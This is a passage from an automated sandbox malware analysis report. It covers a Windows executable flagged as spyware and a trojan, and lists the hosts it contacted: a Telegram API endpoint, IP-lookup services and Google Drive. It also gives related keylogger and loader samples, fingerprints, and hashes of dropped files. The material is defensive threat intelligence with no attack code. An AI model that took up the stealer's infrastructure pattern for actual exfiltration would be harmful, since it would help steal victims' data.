                                                    http://checkip.dyndns.orgrXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359C8000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035761000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035B71000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035AE6000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035BBF000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.000000003596B000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.000000003592A000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://apis.google.comrXKfKM0T49.exe, 00000003.00000003.1922928431.0000000005282000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000003.1922862011.0000000005282000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://checkip.dyndns.comrXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359C8000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035B71000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035AE6000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035BBF000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.000000003596B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://nsis.sf.net/NSIS_ErrorErrorrXKfKM0T49.exefalse
                                                            		high
                                                            http://api.telegram.orgrXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359C8000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035B71000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035AE6000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035BBF000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.000000003596B000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.000000003592A000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namerXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035761000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://checkip.dyndnrXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://reallyfreegeoip.org/xml/rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035791000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  149.154.167.220
                                                                  		api.telegram.orgUnited Kingdom
                                                                  		62041TELEGRAMRUfalse
                                                                  142.250.181.225
                                                                  		drive.usercontent.google.comUnited States
                                                                  		15169GOOGLEUSfalse
                                                                  104.21.96.1
                                                                  		reallyfreegeoip.orgUnited States
                                                                  		13335CLOUDFLARENETUSfalse
                                                                  216.58.206.46
                                                                  		drive.google.comUnited States
                                                                  		15169GOOGLEUSfalse
                                                                  132.226.247.73
                                                                  		checkip.dyndns.comUnited States
                                                                  		16989UTMEMUSfalse

                                                                  General Information

                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                  Analysis ID:1588260
                                                                  Start date and time:2025-01-10 23:09:57 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 7m 28s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:8
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:rXKfKM0T49.exe
                                                                  renamed because original name is a hash value
                                                                  Original Sample Name:28d6a2e755f646875e1ed22b6e8443e074e2fa7730d4f202ffe21c48db789fad.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@3/8@5/5
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HCA Information:
                                                                  • Successful, ratio: 95%
                                                                  • Number of executed functions: 167
                                                                  • Number of non-executed functions: 109
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
                                                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  17:11:58API Interceptor16750x Sleep call for process: rXKfKM0T49.exe modified

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  149.154.167.2204Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                            JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                  2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      104.21.96.1gH3LlhcRzg.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.dejikenkyu.cyou/58m5/
                                                                                      EIvidclKOb.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.mffnow.info/0pqe/
                                                                                      zE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.aonline.top/fqlg/
                                                                                      QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                                      • www.mzkd6gp5.top/3u0p/
                                                                                      SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                      • pelisplus.so/administrator/index.php
                                                                                      Recibos.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.mffnow.info/1a34/
                                                                                      132.226.247.734Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      upXUt2jZ0S.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      oEQp0EklDb.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      19d6P55zd1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • checkip.dyndns.org/

                                                                                      Domains

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      reallyfreegeoip.orgYef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.112.1
                                                                                      b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 104.21.80.1
                                                                                      UF7jzc7ETP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 104.21.48.1
                                                                                      9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 104.21.32.1
                                                                                      VQsnGWaNi5.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 104.21.48.1
                                                                                      6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 104.21.80.1
                                                                                      JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.16.1
                                                                                      lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.80.1
                                                                                      V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 104.21.32.1
                                                                                      upXUt2jZ0S.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 104.21.48.1
                                                                                      checkip.dyndns.com4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 132.226.247.73
                                                                                      Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 193.122.6.168
                                                                                      b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 132.226.8.169
                                                                                      UF7jzc7ETP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 132.226.8.169
                                                                                      9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 132.226.247.73
                                                                                      VQsnGWaNi5.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 193.122.130.0
                                                                                      6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 132.226.247.73
                                                                                      JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 132.226.247.73
                                                                                      lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 193.122.130.0
                                                                                      V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 132.226.8.169
                                                                                      api.telegram.orgYef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 149.154.167.220

                                                                                      ASNs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      TELEGRAMRU4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      CLOUDFLARENETUS4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 104.21.112.1
                                                                                      gH3LlhcRzg.exeGet hashmaliciousFormBookBrowse
                                                                                      • 104.21.96.1
                                                                                      Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.112.1
                                                                                      M7XS5C07kV.exeGet hashmaliciousFormBookBrowse
                                                                                      • 172.67.186.192
                                                                                      b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 104.21.80.1
                                                                                      UF7jzc7ETP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 104.21.48.1
                                                                                      9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 104.21.32.1
                                                                                      VQsnGWaNi5.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 104.21.48.1
                                                                                      6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 104.21.80.1
                                                                                      http://@1800-web.com/new/auth/6XEcGVvsnjwXq8bbJloqbuPkeuHjc6rLcgYUe/bGVvbi5ncmF2ZXNAYXRvcy5uZXQ=Get hashmaliciousUnknownBrowse
                                                                                      • 104.17.25.14
                                                                                      UTMEMUS4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 132.226.247.73
                                                                                      b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 132.226.8.169
                                                                                      UF7jzc7ETP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 132.226.8.169
                                                                                      9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 132.226.247.73
                                                                                      6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 132.226.247.73
                                                                                      JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 132.226.247.73
                                                                                      V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 132.226.8.169
                                                                                      upXUt2jZ0S.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 132.226.247.73
                                                                                      2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 132.226.247.73
                                                                                      6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 132.226.247.73

                                                                                      JA3 Fingerprints

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      54328bd36c14bd82ddaa0c04b25ed9ad4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 104.21.96.1
                                                                                      Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.96.1
                                                                                      b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 104.21.96.1
                                                                                      UF7jzc7ETP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 104.21.96.1
                                                                                      9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 104.21.96.1
                                                                                      VQsnGWaNi5.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 104.21.96.1
                                                                                      6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 104.21.96.1
                                                                                      JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.96.1
                                                                                      lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.96.1
                                                                                      V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 104.21.96.1
                                                                                      3b5074b1b5d032e5620f69f9f700ff0e4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      3j7f6Bv4FT.exeGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      3j7f6Bv4FT.exeGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      iRmpdWgpoF.exeGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      iRmpdWgpoF.exeGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      3pwbTZtiDu.exeGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      37f463bf4616ecd445d4a1937da06e194Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 142.250.181.225
                                                                                      • 216.58.206.46
                                                                                      b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 142.250.181.225
                                                                                      • 216.58.206.46
                                                                                      9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 142.250.181.225
                                                                                      • 216.58.206.46
                                                                                      6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 142.250.181.225
                                                                                      • 216.58.206.46
                                                                                      V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 142.250.181.225
                                                                                      • 216.58.206.46
                                                                                      2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 142.250.181.225
                                                                                      • 216.58.206.46
                                                                                      6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 142.250.181.225
                                                                                      • 216.58.206.46
                                                                                      v4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 142.250.181.225
                                                                                      • 216.58.206.46
                                                                                      xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 142.250.181.225
                                                                                      • 216.58.206.46
                                                                                      4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 142.250.181.225
                                                                                      • 216.58.206.46

                                                                                      Dropped Files

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      C:\Users\user\AppData\Local\Temp\nspC239.tmp\System.dllb5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  v4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                    xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse

                                                                                                          Created / dropped Files

                                                                                                          C:\Users\user\AppData\Local\Iw\14-scaled.jpg

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 2560x2560, components 3
                                                                                                          Category:dropped
                                                                                                          Size (bytes):484658
                                                                                                          Entropy (8bit):7.809711763657168
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:W1S3xo63wl4biprI2S4WwWEcwxg9dvVAxZOCLF0DB:Wo3xX3y4bz2lWwWo6rSTZyd
                                                                                                          MD5:5C727AE28F0DECF497FBB092BAE01B4E
                                                                                                          SHA1:AADE364AE8C2C91C6F59F85711B53078FB0763B7
                                                                                                          SHA-256:77CCACF58330509839E17A6CFD6B17FE3DE31577D8E2C37DC413839BA2FEEC80
                                                                                                          SHA-512:5246C0FBA41DF66AF89D986A3CEABC99B61DB9E9C217B28B2EC18AF31E3ED17C865387223CEB3A38A804243CF3307E07E557549026F49F52829BEBC4D4546C40
                                                                                                          Malicious:false
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview:......JFIF.....,.,.....]http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.566ebc5, 2022/05/09-07:22:29 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:exif="http://ns.adobe.com/exif/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2018 (Windows)" xmp:CreateDate="2018-04-27T15:00:27+08:00" xmp:ModifyDate="2022-09-22T14:01:54+08:00" xmp:MetadataDate="2022-09-22T14:01:54+08:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:b728d5c8-8822-6d4c-afc1-a393cb2a04ec"

                                                                                                          C:\Users\user\AppData\Local\Iw\Andoke\prepares.pli

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          File Type:FoxPro FPT, blocks size 22, next free block index 285212672, field type 0
                                                                                                          Category:dropped
                                                                                                          Size (bytes):139354
                                                                                                          Entropy (8bit):1.2473328695625903
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:9OsMSh8lSnJGyUzWZsO2ipzPFmDZC9kpzroto48tf2+5lVp:9delFlqNawgJp
                                                                                                          MD5:B0FB6B583D6902DE58E1202D12BA4832
                                                                                                          SHA1:7F585B5C3A4581CE76E373C78A6513F157B20480
                                                                                                          SHA-256:E6EA5F6D0C7F5FA407269C7F4FF6D97149B7611071BF5BF6C454B810501AE661
                                                                                                          SHA-512:E0894FFBD76C3476DC083DAFD24F88964BF6E09E4CA955766B43FE73A764A00247C930E9996652A22B57B27826CD94F88B8178514060CA398DE568675F9E4571
                                                                                                          Malicious:false
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview:.......................................|...................................................................+................$......&....A........................................................Z.....................................A...............!.....Y........................l..........9..................c.............f.................F...".................................................h.......................................\..............J............................5......t.....E.................q........................:......^....................................................................................I..........................................................x......W....................................................................................M...........................X..............................,..................m.......................................................................................................................J........ ...F...........

                                                                                                          C:\Users\user\AppData\Local\Iw\Kbmandsskole.str

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):112291
                                                                                                          Entropy (8bit):1.249420131631438
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:5R+BCpkJWjYWL2MxTVLvUjpGqik9JiAfWA2DBQwD1PzUH+HYZmIo7x31sT:WCZY21w0I2NZYD
                                                                                                          MD5:4D1D72CFC5940B09DFBD7B65916F532E
                                                                                                          SHA1:30A45798B534842002B103A36A3B907063F8A96C
                                                                                                          SHA-256:479F1904096978F1011DF05D52021FAEEE028D4CF331024C965CED8AF1C8D496
                                                                                                          SHA-512:048844A09E291903450188715BCDDF14F0F1F10BEAFBD005882EBF5D5E31A71D8F93EEBE788BD54B4AED2266C454F4DCA18AF4567977B7E773BBE29A38DEA45B
                                                                                                          Malicious:false
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview:..........P............+......................................................................................................................X......n..(................G...................................m.........|.......................U.............`............l..............@}.........a........................................s............y.................N...............B...............w.e..........................................Q......*...................................................................................................a...........................f..................p..................t...........................................9.Q................@....................e................................................................:..............P.......S.........................P........................9..............._.......................(...............N............................................................H.T..........c..............................

                                                                                                          C:\Users\user\AppData\Local\Iw\Kliner225.Pla

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):106104
                                                                                                          Entropy (8bit):4.610026616368888
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:IP3wTh7DRSV+79P0aNI1oQnoz7vqcpMY1E2u+LwLZhyYX:IoThXx7eaNI1FnK2hsLwL9
                                                                                                          MD5:FEF7421EF2B950A579357212A13814E0
                                                                                                          SHA1:32F3468D205DC202181D1E27BF3266923F04CA12
                                                                                                          SHA-256:89AFF9FB847E87231D9D1161094F1509F180B1B26A968410A82D215F755614A4
                                                                                                          SHA-512:3EE75C05BAECDDAEDEC8876AD4F85D0A67E3C0C4051CFD1A3E0D59C3A94B92D84FA0762A166A5B53EDEEC2AA8918C36E770D343C72891A2989A5FD49CBE9770B
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.....rr........JJ.......ii...,,,,..........(....................aa.......................mmmm..........***......................................XX..............!..............................J.....ZZ................D..;;.B.8.:......z.........]..........MM................VV.c........Q....k....kk................................................>............;...h...................../............SS.H......E......iiiii.HHHH.%..........^........................................~......V.4........xx..........,,.................................."""...T.....yyyyy..BBB....6666................888............3..............................JJ...~~.........kk...................WW.====.........[[[[[.......]]].@@@............r...V......7...'.......((..............RRRR.....................#....$..D...................V.E....1....................|..YY................3333.......a........OOO.....................Z........<.............[.........]]]...............g..............D...VVVV........................

                                                                                                          C:\Users\user\AppData\Local\Iw\Osteocele.Tir

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):280856
                                                                                                          Entropy (8bit):7.788212328856588
                                                                                                          Encrypted:false
